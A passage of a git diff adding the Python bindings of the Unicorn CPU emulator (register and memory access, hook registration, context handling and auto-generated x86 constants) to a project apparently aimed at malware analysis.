uc.UC_ERR_OK: + raise UcError(status) + return reg.mantissa, reg.exponent + if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8): + reg = uc_x86_xmm() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.low_qword | (reg.high_qword << 64) + if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16): + reg = uc_x86_ymm() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.first_qword | (reg.second_qword << 64) | (reg.third_qword << 128) | (reg.fourth_qword << 192) + if reg_id is x86_const.UC_X86_REG_MSR: + if opt is None: + raise UcError(uc.UC_ERR_ARG) + reg = uc_x86_msr() + reg.rid = opt + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.value + + if self._arch == uc.UC_ARCH_ARM64: + if reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1): + reg = uc_arm64_neon128() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.low_qword | (reg.high_qword << 64) + + # read to 64bit number to be safe + reg = ctypes.c_uint64(0) + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.value + + # write to a register + def reg_write(self, reg_id, value): + reg = None + + if self._arch == uc.UC_ARCH_X86: + if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]: + assert isinstance(value, tuple) and len(value) == 4 + reg = uc_x86_mmr() + reg.selector = value[0] + reg.base = value[1] + reg.limit = value[2] + reg.flags = value[3] + if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8): + 
reg = uc_x86_float80() + reg.mantissa = value[0] + reg.exponent = value[1] + if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8): + reg = uc_x86_xmm() + reg.low_qword = value & 0xffffffffffffffff + reg.high_qword = value >> 64 + if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16): + reg = uc_x86_ymm() + reg.first_qword = value & 0xffffffffffffffff + reg.second_qword = (value >> 64) & 0xffffffffffffffff + reg.third_qword = (value >> 128) & 0xffffffffffffffff + reg.fourth_qword = value >> 192 + if reg_id is x86_const.UC_X86_REG_MSR: + reg = uc_x86_msr() + reg.rid = value[0] + reg.value = value[1] + + if self._arch == uc.UC_ARCH_ARM64: + if reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1): + reg = uc_arm64_neon128() + reg.low_qword = value & 0xffffffffffffffff + reg.high_qword = value >> 64 + + if reg is None: + # convert to 64bit number to be safe + reg = ctypes.c_uint64(value) + + status = _uc.uc_reg_write(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # read from MSR - X86 only + def msr_read(self, msr_id): + return self.reg_read(x86_const.UC_X86_REG_MSR, msr_id) + + # write to MSR - X86 only + def msr_write(self, msr_id, value): + return self.reg_write(x86_const.UC_X86_REG_MSR, (msr_id, value)) + + # read data from memory + def mem_read(self, address, size): + data = ctypes.create_string_buffer(size) + status = _uc.uc_mem_read(self._uch, address, data, size) + if status != uc.UC_ERR_OK: + raise UcError(status) + return bytearray(data) + + # write to memory + def mem_write(self, address, data): + status = _uc.uc_mem_write(self._uch, address, data, len(data)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # map a range of memory + def mem_map(self, address, size, perms=uc.UC_PROT_ALL): + status = _uc.uc_mem_map(self._uch, address, size, perms) + if status != 
uc.UC_ERR_OK: + raise UcError(status) + + # map a range of memory from a raw host memory address + def mem_map_ptr(self, address, size, perms, ptr): + status = _uc.uc_mem_map_ptr(self._uch, address, size, perms, ptr) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # unmap a range of memory + def mem_unmap(self, address, size): + status = _uc.uc_mem_unmap(self._uch, address, size) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # protect a range of memory + def mem_protect(self, address, size, perms=uc.UC_PROT_ALL): + status = _uc.uc_mem_protect(self._uch, address, size, perms) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # return CPU mode at runtime + def query(self, query_mode): + result = ctypes.c_size_t(0) + status = _uc.uc_query(self._uch, query_mode, ctypes.byref(result)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return result.value + + def _hookcode_cb(self, handle, address, size, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, address, size, data) + + def _hook_mem_invalid_cb(self, handle, access, address, size, value, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + return cb(self, access, address, size, value, data) + + def _hook_mem_access_cb(self, handle, access, address, size, value, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, access, address, size, value, data) + + def _hook_intr_cb(self, handle, intno, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, intno, data) + + def _hook_insn_invalid_cb(self, handle, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + return cb(self, data) + + def _hook_insn_in_cb(self, handle, port, size, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + return 
cb(self, port, size, data) + + def _hook_insn_out_cb(self, handle, port, size, value, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, port, size, value, data) + + def _hook_insn_syscall_cb(self, handle, user_data): + # call user's callback with self object + (cb, data) = self._callbacks[user_data] + cb(self, data) + + # add a hook + def hook_add(self, htype, callback, user_data=None, begin=1, end=0, arg1=0): + _h2 = uc_hook_h() + + # save callback & user_data + self._callback_count += 1 + self._callbacks[self._callback_count] = (callback, user_data) + cb = None + + if htype == uc.UC_HOOK_INSN: + insn = ctypes.c_int(arg1) + if arg1 == x86_const.UC_X86_INS_IN: # IN instruction + cb = ctypes.cast(UC_HOOK_INSN_IN_CB(self._hook_insn_in_cb), UC_HOOK_INSN_IN_CB) + if arg1 == x86_const.UC_X86_INS_OUT: # OUT instruction + cb = ctypes.cast(UC_HOOK_INSN_OUT_CB(self._hook_insn_out_cb), UC_HOOK_INSN_OUT_CB) + if arg1 in (x86_const.UC_X86_INS_SYSCALL, x86_const.UC_X86_INS_SYSENTER): # SYSCALL/SYSENTER instruction + cb = ctypes.cast(UC_HOOK_INSN_SYSCALL_CB(self._hook_insn_syscall_cb), UC_HOOK_INSN_SYSCALL_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end), insn + ) + elif htype == uc.UC_HOOK_INTR: + cb = ctypes.cast(UC_HOOK_INTR_CB(self._hook_intr_cb), UC_HOOK_INTR_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + elif htype == uc.UC_HOOK_INSN_INVALID: + cb = ctypes.cast(UC_HOOK_INSN_INVALID_CB(self._hook_insn_invalid_cb), UC_HOOK_INSN_INVALID_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + else: + if htype in (uc.UC_HOOK_BLOCK, 
uc.UC_HOOK_CODE): + # set callback with wrapper, so it can be called + # with this object as param + cb = ctypes.cast(UC_HOOK_CODE_CB(self._hookcode_cb), UC_HOOK_CODE_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + elif htype & (uc.UC_HOOK_MEM_READ_UNMAPPED | + uc.UC_HOOK_MEM_WRITE_UNMAPPED | + uc.UC_HOOK_MEM_FETCH_UNMAPPED | + uc.UC_HOOK_MEM_READ_PROT | + uc.UC_HOOK_MEM_WRITE_PROT | + uc.UC_HOOK_MEM_FETCH_PROT): + cb = ctypes.cast(UC_HOOK_MEM_INVALID_CB(self._hook_mem_invalid_cb), UC_HOOK_MEM_INVALID_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + else: + cb = ctypes.cast(UC_HOOK_MEM_ACCESS_CB(self._hook_mem_access_cb), UC_HOOK_MEM_ACCESS_CB) + status = _uc.uc_hook_add( + self._uch, ctypes.byref(_h2), htype, cb, + ctypes.cast(self._callback_count, ctypes.c_void_p), + ctypes.c_uint64(begin), ctypes.c_uint64(end) + ) + + # save the ctype function so gc will leave it alone. 
+ self._ctype_cbs[self._callback_count] = cb + + if status != uc.UC_ERR_OK: + raise UcError(status) + + return _h2.value + + # delete a hook + def hook_del(self, h): + _h = uc_hook_h(h) + status = _uc.uc_hook_del(self._uch, _h) + if status != uc.UC_ERR_OK: + raise UcError(status) + h = 0 + + def context_save(self): + context = UcContext(self._uch) + status = _uc.uc_context_save(self._uch, context.context) + if status != uc.UC_ERR_OK: + raise UcError(status) + + return context + + def context_update(self, context): + status = _uc.uc_context_save(self._uch, context.context) + if status != uc.UC_ERR_OK: + raise UcError(status) + + def context_restore(self, context): + status = _uc.uc_context_restore(self._uch, context.context) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # this returns a generator of regions in the form (begin, end, perms) + def mem_regions(self): + regions = ctypes.POINTER(_uc_mem_region)() + count = ctypes.c_uint32() + status = _uc.uc_mem_regions(self._uch, ctypes.byref(regions), ctypes.byref(count)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + try: + for i in range(count.value): + yield (regions[i].begin, regions[i].end, regions[i].perms) + finally: + _uc.uc_free(regions) + + +class UcContext: + def __init__(self, h): + self._context = uc_context() + self._size = _uc.uc_context_size(h) + self._to_free = True + status = _uc.uc_context_alloc(h, ctypes.byref(self._context)) + if status != uc.UC_ERR_OK: + raise UcError(status) + + @property + def context(self): + return self._context + + @property + def size(self): + return self._size + + # Make UcContext picklable + def __getstate__(self): + return (bytes(self), self.size) + + def __setstate__(self, state): + self._size = state[1] + self._context = ctypes.cast(ctypes.create_string_buffer(state[0], self._size), uc_context) + # __init__ won'e be invoked, so we are safe to set it here. 
+ self._to_free = False + + def __bytes__(self): + return ctypes.string_at(self.context, self.size) + + def __del__(self): + # We need this property since we shouldn't free it if the object is constructed from pickled bytes. + if self._to_free: + _uc.uc_context_free(self._context) + + +# print out debugging info +def debug(): + archs = { + "arm": uc.UC_ARCH_ARM, + "arm64": uc.UC_ARCH_ARM64, + "mips": uc.UC_ARCH_MIPS, + "sparc": uc.UC_ARCH_SPARC, + "m68k": uc.UC_ARCH_M68K, + "x86": uc.UC_ARCH_X86, + } + + all_archs = "" + keys = archs.keys() + for k in sorted(keys): + if uc_arch_supported(archs[k]): + all_archs += "-%s" % k + + major, minor, _combined = uc_version() + + return "python-%s-c%u.%u-b%u.%u" % ( + all_archs, major, minor, uc.UC_API_MAJOR, uc.UC_API_MINOR + ) diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn_const.py new file mode 100644 index 0000000..54e2c95 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn_const.py @@ -0,0 +1,108 @@ +# For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.py] +UC_API_MAJOR = 1 + +UC_API_MINOR = 0 +UC_VERSION_MAJOR = 1 + +UC_VERSION_MINOR = 0 +UC_VERSION_EXTRA = 2 +UC_SECOND_SCALE = 1000000 +UC_MILISECOND_SCALE = 1000 +UC_ARCH_ARM = 1 +UC_ARCH_ARM64 = 2 +UC_ARCH_MIPS = 3 +UC_ARCH_X86 = 4 +UC_ARCH_PPC = 5 +UC_ARCH_SPARC = 6 +UC_ARCH_M68K = 7 +UC_ARCH_MAX = 8 + +UC_MODE_LITTLE_ENDIAN = 0 +UC_MODE_BIG_ENDIAN = 1073741824 + +UC_MODE_ARM = 0 +UC_MODE_THUMB = 16 +UC_MODE_MCLASS = 32 +UC_MODE_V8 = 64 +UC_MODE_ARM926 = 128 +UC_MODE_ARM946 = 256 +UC_MODE_ARM1176 = 512 +UC_MODE_MICRO = 16 +UC_MODE_MIPS3 = 32 +UC_MODE_MIPS32R6 = 64 +UC_MODE_MIPS32 = 4 +UC_MODE_MIPS64 = 8 +UC_MODE_16 = 2 +UC_MODE_32 = 4 +UC_MODE_64 = 8 +UC_MODE_PPC32 = 4 +UC_MODE_PPC64 = 8 +UC_MODE_QPX = 16 +UC_MODE_SPARC32 = 4 +UC_MODE_SPARC64 = 8 +UC_MODE_V9 = 16 + +UC_ERR_OK = 0 +UC_ERR_NOMEM = 1 +UC_ERR_ARCH = 2 +UC_ERR_HANDLE = 3 +UC_ERR_MODE = 4 +UC_ERR_VERSION = 5 +UC_ERR_READ_UNMAPPED = 6 +UC_ERR_WRITE_UNMAPPED = 7 +UC_ERR_FETCH_UNMAPPED = 8 +UC_ERR_HOOK = 9 +UC_ERR_INSN_INVALID = 10 +UC_ERR_MAP = 11 +UC_ERR_WRITE_PROT = 12 +UC_ERR_READ_PROT = 13 +UC_ERR_FETCH_PROT = 14 +UC_ERR_ARG = 15 +UC_ERR_READ_UNALIGNED = 16 +UC_ERR_WRITE_UNALIGNED = 17 +UC_ERR_FETCH_UNALIGNED = 18 +UC_ERR_HOOK_EXIST = 19 +UC_ERR_RESOURCE = 20 +UC_ERR_EXCEPTION = 21 +UC_MEM_READ = 16 +UC_MEM_WRITE = 17 +UC_MEM_FETCH = 18 +UC_MEM_READ_UNMAPPED = 19 +UC_MEM_WRITE_UNMAPPED = 20 +UC_MEM_FETCH_UNMAPPED = 21 +UC_MEM_WRITE_PROT = 22 +UC_MEM_READ_PROT = 23 +UC_MEM_FETCH_PROT = 24 +UC_MEM_READ_AFTER = 25 +UC_HOOK_INTR = 1 +UC_HOOK_INSN = 2 +UC_HOOK_CODE = 4 +UC_HOOK_BLOCK = 8 +UC_HOOK_MEM_READ_UNMAPPED = 16 +UC_HOOK_MEM_WRITE_UNMAPPED = 32 +UC_HOOK_MEM_FETCH_UNMAPPED = 64 +UC_HOOK_MEM_READ_PROT = 128 +UC_HOOK_MEM_WRITE_PROT = 256 +UC_HOOK_MEM_FETCH_PROT = 512 +UC_HOOK_MEM_READ = 1024 +UC_HOOK_MEM_WRITE = 2048 +UC_HOOK_MEM_FETCH = 4096 +UC_HOOK_MEM_READ_AFTER = 8192 +UC_HOOK_INSN_INVALID = 16384 +UC_HOOK_MEM_UNMAPPED = 112 +UC_HOOK_MEM_PROT = 
896 +UC_HOOK_MEM_READ_INVALID = 144 +UC_HOOK_MEM_WRITE_INVALID = 288 +UC_HOOK_MEM_FETCH_INVALID = 576 +UC_HOOK_MEM_INVALID = 1008 +UC_HOOK_MEM_VALID = 7168 +UC_QUERY_MODE = 1 +UC_QUERY_PAGE_SIZE = 2 +UC_QUERY_ARCH = 3 +UC_QUERY_TIMEOUT = 4 + +UC_PROT_NONE = 0 +UC_PROT_READ = 1 +UC_PROT_WRITE = 2 +UC_PROT_EXEC = 4 +UC_PROT_ALL = 7 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/x86_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/x86_const.py new file mode 100644 index 0000000..9c0fbad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/x86_const.py @@ -0,0 +1,1599 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.py] + +# X86 registers + +UC_X86_REG_INVALID = 0 +UC_X86_REG_AH = 1 +UC_X86_REG_AL = 2 +UC_X86_REG_AX = 3 +UC_X86_REG_BH = 4 +UC_X86_REG_BL = 5 +UC_X86_REG_BP = 6 +UC_X86_REG_BPL = 7 +UC_X86_REG_BX = 8 +UC_X86_REG_CH = 9 +UC_X86_REG_CL = 10 +UC_X86_REG_CS = 11 +UC_X86_REG_CX = 12 +UC_X86_REG_DH = 13 +UC_X86_REG_DI = 14 +UC_X86_REG_DIL = 15 +UC_X86_REG_DL = 16 +UC_X86_REG_DS = 17 +UC_X86_REG_DX = 18 +UC_X86_REG_EAX = 19 +UC_X86_REG_EBP = 20 +UC_X86_REG_EBX = 21 +UC_X86_REG_ECX = 22 +UC_X86_REG_EDI = 23 +UC_X86_REG_EDX = 24 +UC_X86_REG_EFLAGS = 25 +UC_X86_REG_EIP = 26 +UC_X86_REG_EIZ = 27 +UC_X86_REG_ES = 28 +UC_X86_REG_ESI = 29 +UC_X86_REG_ESP = 30 +UC_X86_REG_FPSW = 31 +UC_X86_REG_FS = 32 +UC_X86_REG_GS = 33 +UC_X86_REG_IP = 34 +UC_X86_REG_RAX = 35 +UC_X86_REG_RBP = 36 +UC_X86_REG_RBX = 37 +UC_X86_REG_RCX = 38 +UC_X86_REG_RDI = 39 +UC_X86_REG_RDX = 40 +UC_X86_REG_RIP = 41 +UC_X86_REG_RIZ = 42 +UC_X86_REG_RSI = 43 +UC_X86_REG_RSP = 44 +UC_X86_REG_SI = 45 +UC_X86_REG_SIL = 46 +UC_X86_REG_SP = 47 +UC_X86_REG_SPL = 48 +UC_X86_REG_SS = 49 +UC_X86_REG_CR0 = 50 +UC_X86_REG_CR1 = 51 +UC_X86_REG_CR2 = 52 +UC_X86_REG_CR3 = 53 +UC_X86_REG_CR4 = 54 +UC_X86_REG_CR5 = 55 +UC_X86_REG_CR6 = 56 +UC_X86_REG_CR7 = 57 +UC_X86_REG_CR8 = 58 +UC_X86_REG_CR9 = 59 
+UC_X86_REG_CR10 = 60 +UC_X86_REG_CR11 = 61 +UC_X86_REG_CR12 = 62 +UC_X86_REG_CR13 = 63 +UC_X86_REG_CR14 = 64 +UC_X86_REG_CR15 = 65 +UC_X86_REG_DR0 = 66 +UC_X86_REG_DR1 = 67 +UC_X86_REG_DR2 = 68 +UC_X86_REG_DR3 = 69 +UC_X86_REG_DR4 = 70 +UC_X86_REG_DR5 = 71 +UC_X86_REG_DR6 = 72 +UC_X86_REG_DR7 = 73 +UC_X86_REG_DR8 = 74 +UC_X86_REG_DR9 = 75 +UC_X86_REG_DR10 = 76 +UC_X86_REG_DR11 = 77 +UC_X86_REG_DR12 = 78 +UC_X86_REG_DR13 = 79 +UC_X86_REG_DR14 = 80 +UC_X86_REG_DR15 = 81 +UC_X86_REG_FP0 = 82 +UC_X86_REG_FP1 = 83 +UC_X86_REG_FP2 = 84 +UC_X86_REG_FP3 = 85 +UC_X86_REG_FP4 = 86 +UC_X86_REG_FP5 = 87 +UC_X86_REG_FP6 = 88 +UC_X86_REG_FP7 = 89 +UC_X86_REG_K0 = 90 +UC_X86_REG_K1 = 91 +UC_X86_REG_K2 = 92 +UC_X86_REG_K3 = 93 +UC_X86_REG_K4 = 94 +UC_X86_REG_K5 = 95 +UC_X86_REG_K6 = 96 +UC_X86_REG_K7 = 97 +UC_X86_REG_MM0 = 98 +UC_X86_REG_MM1 = 99 +UC_X86_REG_MM2 = 100 +UC_X86_REG_MM3 = 101 +UC_X86_REG_MM4 = 102 +UC_X86_REG_MM5 = 103 +UC_X86_REG_MM6 = 104 +UC_X86_REG_MM7 = 105 +UC_X86_REG_R8 = 106 +UC_X86_REG_R9 = 107 +UC_X86_REG_R10 = 108 +UC_X86_REG_R11 = 109 +UC_X86_REG_R12 = 110 +UC_X86_REG_R13 = 111 +UC_X86_REG_R14 = 112 +UC_X86_REG_R15 = 113 +UC_X86_REG_ST0 = 114 +UC_X86_REG_ST1 = 115 +UC_X86_REG_ST2 = 116 +UC_X86_REG_ST3 = 117 +UC_X86_REG_ST4 = 118 +UC_X86_REG_ST5 = 119 +UC_X86_REG_ST6 = 120 +UC_X86_REG_ST7 = 121 +UC_X86_REG_XMM0 = 122 +UC_X86_REG_XMM1 = 123 +UC_X86_REG_XMM2 = 124 +UC_X86_REG_XMM3 = 125 +UC_X86_REG_XMM4 = 126 +UC_X86_REG_XMM5 = 127 +UC_X86_REG_XMM6 = 128 +UC_X86_REG_XMM7 = 129 +UC_X86_REG_XMM8 = 130 +UC_X86_REG_XMM9 = 131 +UC_X86_REG_XMM10 = 132 +UC_X86_REG_XMM11 = 133 +UC_X86_REG_XMM12 = 134 +UC_X86_REG_XMM13 = 135 +UC_X86_REG_XMM14 = 136 +UC_X86_REG_XMM15 = 137 +UC_X86_REG_XMM16 = 138 +UC_X86_REG_XMM17 = 139 +UC_X86_REG_XMM18 = 140 +UC_X86_REG_XMM19 = 141 +UC_X86_REG_XMM20 = 142 +UC_X86_REG_XMM21 = 143 +UC_X86_REG_XMM22 = 144 +UC_X86_REG_XMM23 = 145 +UC_X86_REG_XMM24 = 146 +UC_X86_REG_XMM25 = 147 +UC_X86_REG_XMM26 = 148 +UC_X86_REG_XMM27 = 149 
+UC_X86_REG_XMM28 = 150 +UC_X86_REG_XMM29 = 151 +UC_X86_REG_XMM30 = 152 +UC_X86_REG_XMM31 = 153 +UC_X86_REG_YMM0 = 154 +UC_X86_REG_YMM1 = 155 +UC_X86_REG_YMM2 = 156 +UC_X86_REG_YMM3 = 157 +UC_X86_REG_YMM4 = 158 +UC_X86_REG_YMM5 = 159 +UC_X86_REG_YMM6 = 160 +UC_X86_REG_YMM7 = 161 +UC_X86_REG_YMM8 = 162 +UC_X86_REG_YMM9 = 163 +UC_X86_REG_YMM10 = 164 +UC_X86_REG_YMM11 = 165 +UC_X86_REG_YMM12 = 166 +UC_X86_REG_YMM13 = 167 +UC_X86_REG_YMM14 = 168 +UC_X86_REG_YMM15 = 169 +UC_X86_REG_YMM16 = 170 +UC_X86_REG_YMM17 = 171 +UC_X86_REG_YMM18 = 172 +UC_X86_REG_YMM19 = 173 +UC_X86_REG_YMM20 = 174 +UC_X86_REG_YMM21 = 175 +UC_X86_REG_YMM22 = 176 +UC_X86_REG_YMM23 = 177 +UC_X86_REG_YMM24 = 178 +UC_X86_REG_YMM25 = 179 +UC_X86_REG_YMM26 = 180 +UC_X86_REG_YMM27 = 181 +UC_X86_REG_YMM28 = 182 +UC_X86_REG_YMM29 = 183 +UC_X86_REG_YMM30 = 184 +UC_X86_REG_YMM31 = 185 +UC_X86_REG_ZMM0 = 186 +UC_X86_REG_ZMM1 = 187 +UC_X86_REG_ZMM2 = 188 +UC_X86_REG_ZMM3 = 189 +UC_X86_REG_ZMM4 = 190 +UC_X86_REG_ZMM5 = 191 +UC_X86_REG_ZMM6 = 192 +UC_X86_REG_ZMM7 = 193 +UC_X86_REG_ZMM8 = 194 +UC_X86_REG_ZMM9 = 195 +UC_X86_REG_ZMM10 = 196 +UC_X86_REG_ZMM11 = 197 +UC_X86_REG_ZMM12 = 198 +UC_X86_REG_ZMM13 = 199 +UC_X86_REG_ZMM14 = 200 +UC_X86_REG_ZMM15 = 201 +UC_X86_REG_ZMM16 = 202 +UC_X86_REG_ZMM17 = 203 +UC_X86_REG_ZMM18 = 204 +UC_X86_REG_ZMM19 = 205 +UC_X86_REG_ZMM20 = 206 +UC_X86_REG_ZMM21 = 207 +UC_X86_REG_ZMM22 = 208 +UC_X86_REG_ZMM23 = 209 +UC_X86_REG_ZMM24 = 210 +UC_X86_REG_ZMM25 = 211 +UC_X86_REG_ZMM26 = 212 +UC_X86_REG_ZMM27 = 213 +UC_X86_REG_ZMM28 = 214 +UC_X86_REG_ZMM29 = 215 +UC_X86_REG_ZMM30 = 216 +UC_X86_REG_ZMM31 = 217 +UC_X86_REG_R8B = 218 +UC_X86_REG_R9B = 219 +UC_X86_REG_R10B = 220 +UC_X86_REG_R11B = 221 +UC_X86_REG_R12B = 222 +UC_X86_REG_R13B = 223 +UC_X86_REG_R14B = 224 +UC_X86_REG_R15B = 225 +UC_X86_REG_R8D = 226 +UC_X86_REG_R9D = 227 +UC_X86_REG_R10D = 228 +UC_X86_REG_R11D = 229 +UC_X86_REG_R12D = 230 +UC_X86_REG_R13D = 231 +UC_X86_REG_R14D = 232 +UC_X86_REG_R15D = 233 +UC_X86_REG_R8W = 234 
+UC_X86_REG_R9W = 235 +UC_X86_REG_R10W = 236 +UC_X86_REG_R11W = 237 +UC_X86_REG_R12W = 238 +UC_X86_REG_R13W = 239 +UC_X86_REG_R14W = 240 +UC_X86_REG_R15W = 241 +UC_X86_REG_IDTR = 242 +UC_X86_REG_GDTR = 243 +UC_X86_REG_LDTR = 244 +UC_X86_REG_TR = 245 +UC_X86_REG_FPCW = 246 +UC_X86_REG_FPTAG = 247 +UC_X86_REG_MSR = 248 +UC_X86_REG_MXCSR = 249 +UC_X86_REG_FS_BASE = 250 +UC_X86_REG_GS_BASE = 251 +UC_X86_REG_ENDING = 252 + +# X86 instructions + +UC_X86_INS_INVALID = 0 +UC_X86_INS_AAA = 1 +UC_X86_INS_AAD = 2 +UC_X86_INS_AAM = 3 +UC_X86_INS_AAS = 4 +UC_X86_INS_FABS = 5 +UC_X86_INS_ADC = 6 +UC_X86_INS_ADCX = 7 +UC_X86_INS_ADD = 8 +UC_X86_INS_ADDPD = 9 +UC_X86_INS_ADDPS = 10 +UC_X86_INS_ADDSD = 11 +UC_X86_INS_ADDSS = 12 +UC_X86_INS_ADDSUBPD = 13 +UC_X86_INS_ADDSUBPS = 14 +UC_X86_INS_FADD = 15 +UC_X86_INS_FIADD = 16 +UC_X86_INS_FADDP = 17 +UC_X86_INS_ADOX = 18 +UC_X86_INS_AESDECLAST = 19 +UC_X86_INS_AESDEC = 20 +UC_X86_INS_AESENCLAST = 21 +UC_X86_INS_AESENC = 22 +UC_X86_INS_AESIMC = 23 +UC_X86_INS_AESKEYGENASSIST = 24 +UC_X86_INS_AND = 25 +UC_X86_INS_ANDN = 26 +UC_X86_INS_ANDNPD = 27 +UC_X86_INS_ANDNPS = 28 +UC_X86_INS_ANDPD = 29 +UC_X86_INS_ANDPS = 30 +UC_X86_INS_ARPL = 31 +UC_X86_INS_BEXTR = 32 +UC_X86_INS_BLCFILL = 33 +UC_X86_INS_BLCI = 34 +UC_X86_INS_BLCIC = 35 +UC_X86_INS_BLCMSK = 36 +UC_X86_INS_BLCS = 37 +UC_X86_INS_BLENDPD = 38 +UC_X86_INS_BLENDPS = 39 +UC_X86_INS_BLENDVPD = 40 +UC_X86_INS_BLENDVPS = 41 +UC_X86_INS_BLSFILL = 42 +UC_X86_INS_BLSI = 43 +UC_X86_INS_BLSIC = 44 +UC_X86_INS_BLSMSK = 45 +UC_X86_INS_BLSR = 46 +UC_X86_INS_BOUND = 47 +UC_X86_INS_BSF = 48 +UC_X86_INS_BSR = 49 +UC_X86_INS_BSWAP = 50 +UC_X86_INS_BT = 51 +UC_X86_INS_BTC = 52 +UC_X86_INS_BTR = 53 +UC_X86_INS_BTS = 54 +UC_X86_INS_BZHI = 55 +UC_X86_INS_CALL = 56 +UC_X86_INS_CBW = 57 +UC_X86_INS_CDQ = 58 +UC_X86_INS_CDQE = 59 +UC_X86_INS_FCHS = 60 +UC_X86_INS_CLAC = 61 +UC_X86_INS_CLC = 62 +UC_X86_INS_CLD = 63 +UC_X86_INS_CLFLUSH = 64 +UC_X86_INS_CLFLUSHOPT = 65 +UC_X86_INS_CLGI = 66 +UC_X86_INS_CLI = 
67 +UC_X86_INS_CLTS = 68 +UC_X86_INS_CLWB = 69 +UC_X86_INS_CMC = 70 +UC_X86_INS_CMOVA = 71 +UC_X86_INS_CMOVAE = 72 +UC_X86_INS_CMOVB = 73 +UC_X86_INS_CMOVBE = 74 +UC_X86_INS_FCMOVBE = 75 +UC_X86_INS_FCMOVB = 76 +UC_X86_INS_CMOVE = 77 +UC_X86_INS_FCMOVE = 78 +UC_X86_INS_CMOVG = 79 +UC_X86_INS_CMOVGE = 80 +UC_X86_INS_CMOVL = 81 +UC_X86_INS_CMOVLE = 82 +UC_X86_INS_FCMOVNBE = 83 +UC_X86_INS_FCMOVNB = 84 +UC_X86_INS_CMOVNE = 85 +UC_X86_INS_FCMOVNE = 86 +UC_X86_INS_CMOVNO = 87 +UC_X86_INS_CMOVNP = 88 +UC_X86_INS_FCMOVNU = 89 +UC_X86_INS_CMOVNS = 90 +UC_X86_INS_CMOVO = 91 +UC_X86_INS_CMOVP = 92 +UC_X86_INS_FCMOVU = 93 +UC_X86_INS_CMOVS = 94 +UC_X86_INS_CMP = 95 +UC_X86_INS_CMPPD = 96 +UC_X86_INS_CMPPS = 97 +UC_X86_INS_CMPSB = 98 +UC_X86_INS_CMPSD = 99 +UC_X86_INS_CMPSQ = 100 +UC_X86_INS_CMPSS = 101 +UC_X86_INS_CMPSW = 102 +UC_X86_INS_CMPXCHG16B = 103 +UC_X86_INS_CMPXCHG = 104 +UC_X86_INS_CMPXCHG8B = 105 +UC_X86_INS_COMISD = 106 +UC_X86_INS_COMISS = 107 +UC_X86_INS_FCOMP = 108 +UC_X86_INS_FCOMPI = 109 +UC_X86_INS_FCOMI = 110 +UC_X86_INS_FCOM = 111 